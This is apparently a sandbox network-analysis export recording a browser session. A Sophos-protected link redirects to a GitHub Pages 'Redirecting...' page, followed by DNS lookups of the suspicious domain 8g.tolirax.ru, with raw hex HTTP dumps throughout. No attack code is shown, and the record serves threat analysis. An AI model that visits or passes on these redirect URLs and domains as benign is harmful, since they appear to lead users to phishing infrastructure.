                                                                  Dec 20, 2024 06:20:17.693922043 CET49869443192.168.2.4142.250.181.132
                                                                  Dec 20, 2024 06:20:17.693952084 CET44349869142.250.181.132192.168.2.4
                                                                  Dec 20, 2024 06:20:17.695473909 CET44349869142.250.181.132192.168.2.4
                                                                  Dec 20, 2024 06:20:17.695790052 CET49869443192.168.2.4142.250.181.132
                                                                  Dec 20, 2024 06:20:17.695983887 CET44349869142.250.181.132192.168.2.4
                                                                  Dec 20, 2024 06:20:17.744226933 CET49869443192.168.2.4142.250.181.132
                                                                  Dec 20, 2024 06:20:27.416496992 CET44349869142.250.181.132192.168.2.4
                                                                  Dec 20, 2024 06:20:27.416666985 CET44349869142.250.181.132192.168.2.4
                                                                  Dec 20, 2024 06:20:27.416722059 CET49869443192.168.2.4142.250.181.132
                                                                  Dec 20, 2024 06:20:27.730572939 CET49869443192.168.2.4142.250.181.132
                                                                  Dec 20, 2024 06:20:27.730601072 CET44349869142.250.181.132192.168.2.4
                                                                  Dec 20, 2024 06:21:16.058222055 CET50006443192.168.2.4142.250.181.132
                                                                  Dec 20, 2024 06:21:16.058259964 CET44350006142.250.181.132192.168.2.4
                                                                  Dec 20, 2024 06:21:16.058372974 CET50006443192.168.2.4142.250.181.132
                                                                  Dec 20, 2024 06:21:16.058973074 CET50006443192.168.2.4142.250.181.132
                                                                  Dec 20, 2024 06:21:16.058984995 CET44350006142.250.181.132192.168.2.4
                                                                  Dec 20, 2024 06:21:17.765769958 CET44350006142.250.181.132192.168.2.4
                                                                  Dec 20, 2024 06:21:17.766354084 CET50006443192.168.2.4142.250.181.132
                                                                  Dec 20, 2024 06:21:17.766365051 CET44350006142.250.181.132192.168.2.4
                                                                  Dec 20, 2024 06:21:17.767071009 CET44350006142.250.181.132192.168.2.4
                                                                  Dec 20, 2024 06:21:17.767910004 CET50006443192.168.2.4142.250.181.132
                                                                  Dec 20, 2024 06:21:17.767996073 CET44350006142.250.181.132192.168.2.4
                                                                  Dec 20, 2024 06:21:17.822087049 CET50006443192.168.2.4142.250.181.132
                                                                  Dec 20, 2024 06:21:27.472559929 CET44350006142.250.181.132192.168.2.4
                                                                  Dec 20, 2024 06:21:27.472692966 CET44350006142.250.181.132192.168.2.4
                                                                  Dec 20, 2024 06:21:27.472744942 CET50006443192.168.2.4142.250.181.132
                                                                  Dec 20, 2024 06:21:27.730259895 CET50006443192.168.2.4142.250.181.132
                                                                  Dec 20, 2024 06:21:27.730284929 CET44350006142.250.181.132192.168.2.4
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 20, 2024 06:18:54.044414043 CET6463153192.168.2.41.1.1.1
                                                                  Dec 20, 2024 06:18:59.314673901 CET138138192.168.2.4192.168.2.255
                                                                  Dec 20, 2024 06:19:11.549503088 CET5478753192.168.2.41.1.1.1
                                                                  Dec 20, 2024 06:19:11.550132990 CET5750153192.168.2.41.1.1.1
                                                                  Dec 20, 2024 06:19:11.570291996 CET53646331.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:11.688633919 CET53647131.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:12.151561022 CET53547871.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:12.152426958 CET53575011.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:14.380640030 CET53502631.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:15.078458071 CET6363653192.168.2.41.1.1.1
                                                                  Dec 20, 2024 06:19:15.078596115 CET6342453192.168.2.41.1.1.1
                                                                  Dec 20, 2024 06:19:15.277901888 CET53636361.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:15.311331034 CET53634241.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:15.932732105 CET5861153192.168.2.41.1.1.1
                                                                  Dec 20, 2024 06:19:15.932991028 CET5190453192.168.2.41.1.1.1
                                                                  Dec 20, 2024 06:19:16.069869041 CET53586111.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:16.070430040 CET53519041.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:20.094656944 CET5583153192.168.2.41.1.1.1
                                                                  Dec 20, 2024 06:19:20.094917059 CET6018353192.168.2.41.1.1.1
                                                                  Dec 20, 2024 06:19:20.454822063 CET53601831.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:20.455719948 CET53558311.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:23.949320078 CET53643151.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:24.731421947 CET6408753192.168.2.41.1.1.1
                                                                  Dec 20, 2024 06:19:24.731548071 CET5601953192.168.2.41.1.1.1
                                                                  Dec 20, 2024 06:19:24.869775057 CET53560191.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:24.871370077 CET53640871.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:26.983084917 CET4968353192.168.2.41.1.1.1
                                                                  Dec 20, 2024 06:19:26.983227015 CET5804553192.168.2.41.1.1.1
                                                                  Dec 20, 2024 06:19:27.120560884 CET53580451.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:27.121227026 CET53496831.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:27.157186031 CET53602971.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:27.354759932 CET5333353192.168.2.41.1.1.1
                                                                  Dec 20, 2024 06:19:27.354863882 CET5650353192.168.2.41.1.1.1
                                                                  Dec 20, 2024 06:19:27.491858006 CET53533331.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:27.492063999 CET53565031.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:31.398235083 CET53591151.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:19:50.243308067 CET53559741.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:20:11.245270014 CET53498581.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:20:13.290466070 CET53653501.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:20:43.663687944 CET53536921.1.1.1192.168.2.4
                                                                  Dec 20, 2024 06:21:29.476387024 CET53525101.1.1.1192.168.2.4
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Dec 20, 2024 06:18:54.044414043 CET192.168.2.41.1.1.10x55d7Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:11.549503088 CET192.168.2.41.1.1.10xf8abStandard query (0)us-east-2.protection.sophos.comA (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:11.550132990 CET192.168.2.41.1.1.10x5792Standard query (0)us-east-2.protection.sophos.com65IN (0x0001)false
                                                                  Dec 20, 2024 06:19:15.078458071 CET192.168.2.41.1.1.10xe4caStandard query (0)purogosouls.github.ioA (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:15.078596115 CET192.168.2.41.1.1.10xb6cdStandard query (0)purogosouls.github.io65IN (0x0001)false
                                                                  Dec 20, 2024 06:19:15.932732105 CET192.168.2.41.1.1.10xfc26Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:15.932991028 CET192.168.2.41.1.1.10xf9e4Standard query (0)www.google.com65IN (0x0001)false
                                                                  Dec 20, 2024 06:19:20.094656944 CET192.168.2.41.1.1.10xdf79Standard query (0)8g.tolirax.ruA (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:20.094917059 CET192.168.2.41.1.1.10xed52Standard query (0)8g.tolirax.ru65IN (0x0001)false
                                                                  Dec 20, 2024 06:19:24.731421947 CET192.168.2.41.1.1.10x1c8fStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:24.731548071 CET192.168.2.41.1.1.10x365dStandard query (0)code.jquery.com65IN (0x0001)false
                                                                  Dec 20, 2024 06:19:26.983084917 CET192.168.2.41.1.1.10x770bStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:26.983227015 CET192.168.2.41.1.1.10x3addStandard query (0)code.jquery.com65IN (0x0001)false
                                                                  Dec 20, 2024 06:19:27.354759932 CET192.168.2.41.1.1.10xbffbStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:27.354863882 CET192.168.2.41.1.1.10x9442Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Dec 20, 2024 06:18:54.349194050 CET1.1.1.1192.168.2.40x55d7No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                  Dec 20, 2024 06:18:56.171195030 CET1.1.1.1192.168.2.40x6946No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:18:56.171195030 CET1.1.1.1192.168.2.40x6946No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:12.151561022 CET1.1.1.1192.168.2.40xf8abNo error (0)us-east-2.protection.sophos.comd1nhsro6ypf0az.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:12.151561022 CET1.1.1.1192.168.2.40xf8abNo error (0)d1nhsro6ypf0az.cloudfront.net108.158.75.114A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:12.151561022 CET1.1.1.1192.168.2.40xf8abNo error (0)d1nhsro6ypf0az.cloudfront.net108.158.75.33A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:12.151561022 CET1.1.1.1192.168.2.40xf8abNo error (0)d1nhsro6ypf0az.cloudfront.net108.158.75.98A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:12.151561022 CET1.1.1.1192.168.2.40xf8abNo error (0)d1nhsro6ypf0az.cloudfront.net108.158.75.25A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:12.152426958 CET1.1.1.1192.168.2.40x5792No error (0)us-east-2.protection.sophos.comd1nhsro6ypf0az.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:15.277901888 CET1.1.1.1192.168.2.40xe4caNo error (0)purogosouls.github.io185.199.108.153A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:15.277901888 CET1.1.1.1192.168.2.40xe4caNo error (0)purogosouls.github.io185.199.109.153A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:15.277901888 CET1.1.1.1192.168.2.40xe4caNo error (0)purogosouls.github.io185.199.110.153A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:15.277901888 CET1.1.1.1192.168.2.40xe4caNo error (0)purogosouls.github.io185.199.111.153A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:16.069869041 CET1.1.1.1192.168.2.40xfc26No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:16.070430040 CET1.1.1.1192.168.2.40xf9e4No error (0)www.google.com65IN (0x0001)false
                                                                  Dec 20, 2024 06:19:20.454822063 CET1.1.1.1192.168.2.40xed52No error (0)8g.tolirax.ru65IN (0x0001)false
                                                                  Dec 20, 2024 06:19:20.455719948 CET1.1.1.1192.168.2.40xdf79No error (0)8g.tolirax.ru104.21.49.70A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:20.455719948 CET1.1.1.1192.168.2.40xdf79No error (0)8g.tolirax.ru172.67.160.163A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:24.871370077 CET1.1.1.1192.168.2.40x1c8fNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:24.871370077 CET1.1.1.1192.168.2.40x1c8fNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:24.871370077 CET1.1.1.1192.168.2.40x1c8fNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:24.871370077 CET1.1.1.1192.168.2.40x1c8fNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:27.121227026 CET1.1.1.1192.168.2.40x770bNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:27.121227026 CET1.1.1.1192.168.2.40x770bNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:27.121227026 CET1.1.1.1192.168.2.40x770bNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:27.121227026 CET1.1.1.1192.168.2.40x770bNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 06:19:27.491858006 CET1.1.1.1192.168.2.40xbffbNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                  • us-east-2.protection.sophos.com
                                                                  • purogosouls.github.io
                                                                  • https:
                                                                    • 8g.tolirax.ru
                                                                    • code.jquery.com
                                                                  • a.nel.cloudflare.com
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449757108.158.75.1144432488C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-20 05:19:13 UTC979OUTGET /?d=purogosouls.github.io&u=aHR0cHM6Ly9wdXJvZ29zb3Vscy5naXRodWIuaW8vNjRkczZmNHM5ZDRmODlzZDRzZjQ2c2Q0ZjYv&i=NWQ0M2E1N2M3M2U5MzQxMGM1NjBhNmQ1&t=dEtlN04wQWZmZ0hqZlpiZEYwVXZ4NHFvc2NQNGtsUWl4Unlndk5helZOaz0=&h=356f16f6a39049efa5b305c7477e094a&s=AVNPUEhUT0NFTkNSWVBUSVZaHP6eDnex344kFPbGkNGwPXEfGJHtcvdIV0gRc1_JzA HTTP/1.1
                                                                  Host: us-east-2.protection.sophos.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-20 05:19:15 UTC655INHTTP/1.1 302 Found
                                                                  Content-Type: text/html
                                                                  Content-Length: 0
                                                                  Connection: close
                                                                  Date: Fri, 20 Dec 2024 05:19:14 GMT
                                                                  X-Amzn-Trace-Id: Root=1-6764fe52-6ce62cde394671eb23153804;Parent=2ea019ba70b81be7;Sampled=0;Lineage=1:2ebe4394:0
                                                                  x-amzn-RequestId: 5c2be5f3-bdc4-4871-9ba2-4abae87b1c85
                                                                  Referrer-Policy: no-referrer
                                                                  X-Robots-Tag: noindex, nofollow
                                                                  x-amz-apigw-id: DEys-EddCYcEFJg=
                                                                  Location: https://purogosouls.github.io/64ds6f4s9d4f89sd4sf46sd4f6/
                                                                  X-Cache: Miss from cloudfront
                                                                  Via: 1.1 28faeddd0f2a66ea58334f6c438c3c2c.cloudfront.net (CloudFront)
                                                                  X-Amz-Cf-Pop: BAH53-P2
                                                                  X-Amz-Cf-Id: vpok-vxIeWL0HyYMC-S8EbwgdSeqO5bFx8SUPFF-WxDIb7eRHo9uNw==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.449759185.199.108.1534432488C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-20 05:19:16 UTC691OUTGET /64ds6f4s9d4f89sd4sf46sd4f6/ HTTP/1.1
                                                                  Host: purogosouls.github.io
                                                                  Connection: keep-alive
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-20 05:19:17 UTC730INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  Content-Length: 491
                                                                  Server: GitHub.com
                                                                  Content-Type: text/html; charset=utf-8
                                                                  permissions-policy: interest-cohort=()
                                                                  Last-Modified: Thu, 19 Dec 2024 22:02:54 GMT
                                                                  Access-Control-Allow-Origin: *
                                                                  Strict-Transport-Security: max-age=31556952
                                                                  ETag: "6764980e-1eb"
                                                                  expires: Fri, 20 Dec 2024 05:29:16 GMT
                                                                  Cache-Control: max-age=600
                                                                  x-proxy-cache: MISS
                                                                  X-GitHub-Request-Id: F7F1:35095:2D779E:30DDB9:6764FE54
                                                                  Accept-Ranges: bytes
                                                                  Age: 0
                                                                  Date: Fri, 20 Dec 2024 05:19:16 GMT
                                                                  Via: 1.1 varnish
                                                                  X-Served-By: cache-ewr-kewr1740062-EWR
                                                                  X-Cache: MISS
                                                                  X-Cache-Hits: 0
                                                                  X-Timer: S1734671957.847805,VS0,VE20
                                                                  Vary: Accept-Encoding
                                                                  X-Fastly-Request-ID: 82b0eed112345d749047c82871d4f699c45e3459
                                                                  2024-12-20 05:19:17 UTC491INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 52 65 64 69 72 65 63 74 20 61 66 74 65 72 20 33 20 73 65 63 6f 6e 64 73 0d
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Redirecting...</title> <script type="text/javascript"> // Redirect after 3 seconds


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.449761185.199.108.1534432488C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-20 05:19:18 UTC625OUTGET /favicon.ico HTTP/1.1
                                                                  Host: purogosouls.github.io
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://purogosouls.github.io/64ds6f4s9d4f89sd4sf46sd4f6/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-20 05:19:18 UTC635INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  Content-Length: 9115
                                                                  Server: GitHub.com
                                                                  Content-Type: text/html; charset=utf-8
                                                                  permissions-policy: interest-cohort=()
                                                                  ETag: "6758a043-239b"
                                                                  Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
                                                                  X-GitHub-Request-Id: 7A8B:1C3531:2C243E:2F8AD9:6764FE54
                                                                  Accept-Ranges: bytes
                                                                  Age: 0
                                                                  Date: Fri, 20 Dec 2024 05:19:18 GMT
                                                                  Via: 1.1 varnish
                                                                  X-Served-By: cache-ewr-kewr1740066-EWR
                                                                  X-Cache: MISS
                                                                  X-Cache-Hits: 0
                                                                  X-Timer: S1734671959.570461,VS0,VE11
                                                                  Vary: Accept-Encoding
                                                                  X-Fastly-Request-ID: b0f46557af894445b73974fbae367581343e320d
                                                                  2024-12-20 05:19:18 UTC1378INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 73 74 79 6c 65 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 3b 20 69 6d 67 2d 73 72 63 20 64 61 74 61 3a 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53
                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"> <title>S
                                                                  2024-12-20 05:19:18 UTC1378INData Raw: 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 20 32 29 2c 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 31 39 32 64 70 69 29 2c 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 32 64 70 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 2d 69 6d 67 2d 31 78 20 7b 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 7d 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 2d 69 6d 67 2d 32 78 20 7b 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 20 7d 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 23 73 75
                                                                  Data Ascii: ice-pixel-ratio: 2), only screen and ( min-resolution: 192dpi), only screen and ( min-resolution: 2dppx) { .logo-img-1x { display: none; } .logo-img-2x { display: inline-block; } } #su
                                                                  2024-12-20 05:19:18 UTC1378INData Raw: 78 34 4f 6e 68 74 63 47 31 6c 64 47 45 67 65 47 31 73 62 6e 4d 36 65 44 30 69 59 57 52 76 59 6d 55 36 62 6e 4d 36 62 57 56 30 59 53 38 69 49 48 67 36 65 47 31 77 64 47 73 39 49 6b 46 6b 62 32 4a 6c 49 46 68 4e 55 43 42 44 62 33 4a 6c 49 44 55 75 4d 79 31 6a 4d 44 45 78 49 44 59 32 4c 6a 45 30 4e 54 59 32 4d 53 77 67 4d 6a 41 78 4d 69 38 77 4d 69 38 77 4e 69 30 78 4e 44 6f 31 4e 6a 6f 79 4e 79 41 67 49 43 41 67 49 43 41 67 49 6a 34 67 50 48 4a 6b 5a 6a 70 53 52 45 59 67 65 47 31 73 62 6e 4d 36 63 6d 52 6d 50 53 4a 6f 64 48 52 77 4f 69 38 76 64 33 64 33 4c 6e 63 7a 4c 6d 39 79 5a 79 38 78 4f 54 6b 35 4c 7a 41 79 4c 7a 49 79 4c 58 4a 6b 5a 69 31 7a 65 57 35 30 59 58 67 74 62 6e 4d 6a 49 6a 34 67 50 48 4a 6b 5a 6a 70 45 5a 58 4e 6a 63 6d 6c 77 64 47 6c 76 62
                                                                  Data Ascii: x4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvb
                                                                  2024-12-20 05:19:18 UTC1378INData Raw: 45 39 46 4e 72 67 77 42 43 4c 69 72 4d 46 56 39 4f 6b 68 35 65 66 6c 46 68 38 50 52 35 6e 4b 35 6e 44 61 62 72 52 32 42 4e 4a 6c 4b 4f 30 54 33 35 2b 4c 69 34 6e 34 2b 2f 4a 2b 2f 4a 51 43 78 68 6d 75 35 68 33 75 4a 6f 58 4e 48 50 62 6d 57 5a 41 48 4d 73 68 57 42 38 6c 35 2f 69 70 71 61 6d 6d 61 41 66 30 7a 50 44 44 78 31 4f 4e 56 33 76 75 72 64 69 64 71 77 41 51 4c 2b 70 45 63 38 73 4c 63 41 65 31 43 43 76 51 33 59 48 78 49 57 38 50 6c 38 35 78 53 57 4e 43 31 68 41 44 44 49 76 30 72 49 45 2f 6f 34 4a 30 6b 33 6b 77 77 34 78 53 6c 77 49 68 63 71 33 45 46 46 4f 6d 37 4b 4e 2f 68 55 47 4f 51 6b 74 30 43 46 61 35 57 70 4e 4a 6c 4d 76 78 42 45 7a 2f 49 56 51 41 78 67 2f 5a 52 5a 6c 39 77 69 48 41 36 33 79 44 59 69 65 4d 37 44 6e 4c 50 35 43 69 41 47 73 43 37
                                                                  Data Ascii: E9FNrgwBCLirMFV9Okh5eflFh8PR5nK5nDabrR2BNJlKO0T35+Li4n4+/J+/JQCxhmu5h3uJoXNHPbmWZAHMshWB8l5/ipqammaAf0zPDDx1ONV3vurdidqwAQL+pEc8sLcAe1CCvQ3YHxIW8Pl85xSWNC1hADDIv0rIE/o4J0k3kww4xSlwIhcq3EFFOm7KN/hUGOQkt0CFa5WpNJlMvxBEz/IVQAxg/ZRZl9wiHA63yDYieM7DnLP5CiAGsC7
                                                                  2024-12-20 05:19:18 UTC1378INData Raw: 62 32 4a 6c 49 46 68 4e 55 43 42 44 62 33 4a 6c 49 44 55 75 4d 79 31 6a 4d 44 45 78 49 44 59 32 4c 6a 45 30 4e 54 59 32 4d 53 77 67 4d 6a 41 78 4d 69 38 77 4d 69 38 77 4e 69 30 78 4e 44 6f 31 4e 6a 6f 79 4e 79 41 67 49 43 41 67 49 43 41 67 49 6a 34 67 50 48 4a 6b 5a 6a 70 53 52 45 59 67 65 47 31 73 62 6e 4d 36 63 6d 52 6d 50 53 4a 6f 64 48 52 77 4f 69 38 76 64 33 64 33 4c 6e 63 7a 4c 6d 39 79 5a 79 38 78 4f 54 6b 35 4c 7a 41 79 4c 7a 49 79 4c 58 4a 6b 5a 69 31 7a 65 57 35 30 59 58 67 74 62 6e 4d 6a 49 6a 34 67 50 48 4a 6b 5a 6a 70 45 5a 58 4e 6a 63 6d 6c 77 64 47 6c 76 62 69 42 79 5a 47 59 36 59 57 4a 76 64 58 51 39 49 69 49 67 65 47 31 73 62 6e 4d 36 65 47 31 77 50 53 4a 6f 64 48 52 77 4f 69 38 76 62 6e 4d 75 59 57 52 76 59 6d 55 75 59 32 39 74 4c 33 68
